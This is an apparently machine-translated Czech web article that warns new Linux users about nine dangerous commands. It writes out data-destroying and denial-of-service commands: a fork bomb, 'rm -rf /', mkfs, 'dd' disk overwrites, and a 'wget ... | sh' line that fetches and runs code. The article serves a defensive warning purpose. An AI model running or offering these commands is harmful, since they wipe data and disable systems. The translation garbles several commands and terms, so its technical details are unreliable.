9 Linux příkazů a kódů, které mají být pozorné
Příkazy Linux shell / terminal jsou velmi silné a jednoduchý příkaz může vést k vymazání složky, souborů nebo kořenové složky atd.
V některých případech vás Linux nebude ani žádat o potvrzení, že příkaz provede ihned, což vás přinese ztratit cenné údaje a informace uloženy v těchto souborech a složkách.
Je běžné, že lidé publikují obsah na webu doporučují novým uživatelům Linuxu tyto příkazy spouštět. To se může zdát jako vtip pro někoho, kdo poslal obsah, ale není to smích pro osobu na druhém konci.
Shromáždili jsme některé příkazy Linuxu, které jsou pro váš systém velmi škodlivé, aby se jim vyhnuly. Mějte na paměti, že jsou opravdu nebezpečné a mohou být dokonce změněny různými způsoby, aby produkovaly nové příkazy způsobit větší škody.
Důležité je poznamenat některé z těchto příkazů jsou nebezpečné pouze v případě, že mají předponu sudo na Ubuntu. Zatímco na jiných distribucích Linuxu bude většina z těchto příkazů nebezpečná jako root.
Podívejte se na 9 příkazů a kódů, kterým byste se měli vyhnout.
1. Linux Fork Bomb Command
: () : |: & ;:
také známý jako Vidlice Bomb je útok typu denial-of-service proti systému Linux. : () : |: & ;:
je bash funkce. Po provedení, opakuje se několikrát, dokud systém nezmrzne.
Můžete se ho zbavit pouze restartováním systému. Buďte tedy opatrní při provádění tohoto příkazu ve vašem prostředí Linux.
2. složka mv / dev / null Příkaz
mv folder / dev / null
je další riskantní příkaz. Dev / null
nebo null zařízení
je soubor zařízení, který zahodí všechna zapsaná data, ale hlásí, že operace zápisu je úspěšně provedena. To je také známé jako bit bucked nebo Černá díra.
3. rm -rf příkaz
rm -rf
příkaz je rychlý způsob smazat sloľku a její obsah v operačním systému Linux. Pokud nevíte, jak jej správně používat, může se stát velmi nebezpečným pro systém. Nejběžnější kombinace a volby používané s příkazem rm-rf jsou uvedeny níže:
rm
Příkaz slouží k odstranění souborů v systému Linux.rm -f
odstraní soubory jen pro čtení ve složce bez výzvy.rm-r
příkaz rekurzivně odstraní obsah složky.rm -d
Příkaz se používá k odstranění prázdného adresáře, ale odmítne odebrat adresář, pokud není prázdný.rm -rf /
Příkaz se používá pro vynucené vymazání (odstraní jej i v případě, že je chráněn proti zápisu) veškerého obsahu v kořenovém adresáři a dílčích složkách.rm -rf *
Příkaz se používá pro vynucené vymazání veškerého obsahu v aktuálním adresáři (adresář, ve kterém právě pracujete) a podadresářích.rm -rf.
Příkaz se používá pro vynucené vymazání veškerého obsahu v aktuální složce a podsložkách.rm-r. [^.] *
příkaz lze také použít.rm -i
Příkaz se používá k odstranění souborů a složek, ale před odstraněním se zobrazí výzva.
4. příkaz mkfs
mkfs
může být nebezpečný příkaz pro váš systém založený na Linuxu, pokud neznáte jeho účel. Všechno napsané po mkfs bude naformátováno a nahrazeno prázdným souborovým systémem Linux.
Všechny níže uvedené příkazy zformátují pevný disk a vyžadují práva správce:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
Příkaz mkfs.cramfs
provede totéž, co je uvedeno výše, ale nevyžaduje administrátorská práva k provedení.
5. Tar Bomb
dehet
Příkaz se používá pro kombinování více souborů do jednoho souboru (archivovaného souboru) v. \ t .dehet formát. Pomocí tohoto příkazu lze vytvořit bombu Arch (Tape Archive).
to je archivní soubor, který exploduje do tisíců nebo milionů souborů s názvy podobnými existujícím souborům do aktuálního adresáře místo do nového adresáře, když je neuveden.
Můžete se vyhnout tomu, že se stanete obětí dehtové bomby pravidelně vytváříme nový ochranný adresář vždy, když obdržíte soubor tar a poté přesunutím přijatého souboru tar do tohoto adresáře před neoznačením.
Pokud je soubor tar skutečně tarovou bombou, můžete jednoduše odstranit nově vytvořený adresář, abyste se ho zbavili. Další způsob, jak se vyhnout explozi dehtové bomby, je přes -t
volba seznamu veškerého obsahu souboru tar vám poskytne představu o typu obsahu obsaženého v souboru tar.
6. dd příkaz
dd
příkaz kopírovat a konvertovat oddíly pevného disku. Pokud však zadáte nesprávný cíl, může se ukázat jako škodlivé.
Příkazem může být kterýkoli z těchto příkazů:
dd if = / dev / hda = / dev / hdb
dd jestliže = / dev / hda = / dev / sdb
dd if = něco = / dev / hda
dd if = něco = / dev / sda
Následující příkaz vynuluje celý primární pevný disk: dd if = / dev / nula = / dev /
7. Kód skriptu Shell
Někdo vás může obětovat dávat vám odkaz na shell skript a potvrzuje, že si jej stáhnete a spustíte. Skript může obsahovat nějaký škodlivý nebo nebezpečný kód uvnitř. formátu příkazu může vypadat takto: wget http: // some_malicious_source -O- | sh
. wget
stáhne skript, zatímco sh stáhne spuštění skriptu.
8. Škodlivý zdrojový kód
Někdo vám poskytne zdrojový kód a požádá vás, abyste jej zkompilovali. Kód může se zdát, že je to normální kód, ale ve skutečnosti je ve velkém zdrojovém kódu zamaskovaný nějaký škodlivý kód a může způsobit poškození systému. Zabránit tomu, aby byl tento druh útoku obětován, přijímat a kompilovat zdrojový kód pouze z důvěryhodných zdrojů.
9. Dekompresní bomba
Obdrželi jste komprimovaný soubor a budete vyzváni k extrahování tohoto souboru, který se zdá být velmi malý, ale může být několik KB. Ve skutečnosti, tento komprimovaný soubor s malou velikostí obsahuje velmi vysoce komprimovaná data.
Jakmile je soubor dekomprimován, jsou extrahovány stovky GB dat můžete vyplnit váš pevný disk snížit výkon vašeho systému. Chcete-li se této situaci vyhnout, vždy nezapomeňte přijímat data z důvěryhodných zdrojů.